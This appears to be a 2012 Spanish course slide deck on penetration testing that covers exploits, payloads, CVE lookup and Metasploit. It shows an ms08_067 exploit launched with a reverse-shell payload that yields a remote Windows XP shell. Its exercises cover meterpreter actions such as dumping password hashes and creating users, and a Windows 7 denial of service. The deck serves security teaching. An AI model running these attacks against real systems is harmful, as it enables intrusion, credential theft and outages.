Seguridad y Alta Disponibilidad:Test de intrusión (III): explotación de vulnerabilidades                                  ...
© Jesús Moreno León, Septiembre de 2012                              Algunos derechos reservados.                 Este art...
ExploitsCuando se han encontrado los bugs, el objetivo es crear unaherramienta que saque partido de ellos, es decir, que s...
Búsqueda de exploitsEl número de vulnerabilidades que se publican diariamente esaltísimo. Sin embargo, el número de exploi...
CVEDetails
CVEDetails
Explotando los bugsMetasploit es una herramientaque aúna una base de datos decabeceras de exploits y depayloads.Se usa por...
Metasploit ExpressLa versión Express es de pago y no es más que un front-endpara el framework Metasploit que incorpora fun...
Metasploit ExpressVeamos los pasos a seguir para conseguir una sesión en esteequipo, que es un Windows XP en el que un usu...
Metasploit Express
Metasploit Express
Metasploit Express
Metasploit Express
Metasploit Express
Metasploit Express
Metasploit Express
Metasploit Express
Metasploit Express
Metasploit FrameworkEste framework incluyeherramientas, bibliotecas, módulosy una interfaz de usuario. Lafuncionalidad bás...
Metasploit Framework¿Cómo se configuran y se lanzan los exploits con el framework?msf> use exploit/windows/smb/ms08_067_ne...
Metasploit Framework●    Práctica 1: aprovechando la misma vulnerabilidad y usando    el mismo exploit, utiliza el payload...
Metasploit Framework●    Práctica 2: DOS a Windows 7, a través de una versión no    actualizada del escritorio remoto     ...
Más información●    Estas diapositivas están basadas en el curso    Pentesting con Metasploit Framework, impartido por Pab...
Próxima SlideShare
Cargando en…5
×

Sad tema2 pen_test_iii

1.048 visualizaciones

Publicado el

Test de Intrusión, test de pentración, pentest,

0 comentarios
0 recomendaciones
Estadísticas
Notas
  • Sé el primero en comentar

  • Sé el primero en recomendar esto

Sin descargas
Visualizaciones
Visualizaciones totales
1.048
En SlideShare
0
De insertados
0
Número de insertados
527
Acciones
Compartido
0
Descargas
16
Comentarios
0
Recomendaciones
0
Insertados 0
No insertados

No hay notas en la diapositiva.

Sad tema2 pen_test_iii

  1. 1. Seguridad y Alta Disponibilidad:Test de intrusión (III): explotación de vulnerabilidades Jesús Moreno León jesus.moreno.edu@ juntadeandalucía.es Septiembre 2012
  2. 2. © Jesús Moreno León, Septiembre de 2012 Algunos derechos reservados. Este artículo se distribuye bajo la licencia“Reconocimiento-CompartirIgual 3.0 España" de Creative Commons, disponible enhttp://creativecommons.org/licenses/by-sa/3.0/es/deed.es Este documento (o uno muy similar) está disponible en (o enlazado desde) http://informatica.gonzalonazareno.org
  3. 3. ExploitsCuando se han encontrado los bugs, el objetivo es crear unaherramienta que saque partido de ellos, es decir, que sea capazde hacer uso de esa “funcionalidad no definida del programa”.Para ello, se analizan las posibilidades y alcance de ese bug y seopta por un determinado exploit, que es, precisamente, uncódigo escrito con el fin de aprovechar un bug para obtenerdiversos privilegios.Todos los exploits tienen dos partes diferenciadas:● La cabecera, que es lo que se denomina exploit puramente y que depende de cada bug● El cuerpo, denominado payload que son acciones ya programadas que se reutilizan entre los diferentes exploits
  4. 4. Búsqueda de exploitsEl número de vulnerabilidades que se publican diariamente esaltísimo. Sin embargo, el número de exploits que se ponendisponibles no iguala ni por asomo al de vulnerabilidadesFrameworks como Metasploit son una herramienta básica paratodo pentester, pero no contiene todos los exploits disponibles,ya que, por ejemplo, muchos exploits sólo se incluyen enframeworks comerciales, como Canvas de Immunity, ya que sondesarrollados con sus equipos de exploiters y no son públicosUna buena base de datos es la de http://www.cvedetails.com Fuente: Seguridad Apple http://www.seguridadapple.com/2012/10/cve- details-buscar-exploits-para.html
  5. 5. CVEDetails
  6. 6. CVEDetails
  7. 7. Explotando los bugsMetasploit es una herramientaque aúna una base de datos decabeceras de exploits y depayloads.Se usa por profesionales de laseguridad informática pararealizar Pentests, administradoresde sistemas para verificar lainstalación de parches einvestigadores de todo el mundopara realizar pruebas. http://www.metasploit.com/
  8. 8. Metasploit ExpressLa versión Express es de pago y no es más que un front-endpara el framework Metasploit que incorpora funcionalidades queautomatizan el proceso de un test de intrusión y permite generarinformes con los resultados. Pasos a seguir: 1. Crear un proyecto 2. Descubrir dispositivos 3, Conseguir acceso a los equipos 4. Tomar el control de una sesión 5. Recoger datos de las máquinas atacadas 6. Limpiar la sesión 7. Generar un informe
  9. 9. Metasploit ExpressVeamos los pasos a seguir para conseguir una sesión en esteequipo, que es un Windows XP en el que un usuario estánavegando por Internet
  10. 10. Metasploit Express
  11. 11. Metasploit Express
  12. 12. Metasploit Express
  13. 13. Metasploit Express
  14. 14. Metasploit Express
  15. 15. Metasploit Express
  16. 16. Metasploit Express
  17. 17. Metasploit Express
  18. 18. Metasploit Express
  19. 19. Metasploit FrameworkEste framework incluyeherramientas, bibliotecas, módulosy una interfaz de usuario. Lafuncionalidad básica es un lanzadorde módulos que permite al usuarioconfigurar un exploit y lanzarlocontra un equipo objetivo. Si elexploit tiene éxito, se ejecuta elpayload en el objetivo y se le facilitaal usuario una shell para interactuarcon el payload. http://www.elladodelmal.com/2010/07/metasploit-con-adobe-flash-player-un.html
  20. 20. Metasploit Framework¿Cómo se configuran y se lanzan los exploits con el framework?msf> use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi)> set RHOST X.X.X.XRHOST => 192.168.56.101msf exploit(ms08_067_netapi)> set PAYLOAD windows/shell_reverse_tcpPAYLOAD => windows/shell_reverse_tcpmsf exploit(ms08_067_netapi) > set LHOST Y.Y.Y.YLHOST => 192.168.56.1msf exploit(ms08_067_netapi) > exploit[*] Started reverse handler on 192.168.56.1:4444[*] Automatically detecting the target...[*] Fingerprint: Windows XP - Service Pack 3 – lang:Spanish[*] Selected Target: Windows XP SP3 Spanish (NX)[*] Attempting to trigger the vulnerability...Microsoft Windows XP [Versi?n 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:WINDOWSsystem32>
  21. 21. Metasploit Framework● Práctica 1: aprovechando la misma vulnerabilidad y usando el mismo exploit, utiliza el payload meterpreter e investiga todas las posibilidades que te ofrece una vez conseguida una sesión en la máquina objetivo: ● Subir ficheros ● Ejecutar programas ● Descargar ficheros ● Activar el acceso remoto ● Crear usuarios ● Copiar las hashes de las passwords ● ...
  22. 22. Metasploit Framework● Práctica 2: DOS a Windows 7, a través de una versión no actualizada del escritorio remoto CVE-2012-0002 1. Localizar exploit 2. Configurar exploit 3. Lanzar exploit 4. Pantallazo azul
  23. 23. Más información● Estas diapositivas están basadas en el curso Pentesting con Metasploit Framework, impartido por Pablo González de Informática 64.● http://www.flu-project.com● http://www.seguridadapple.com● www.elladodelmal.com/

×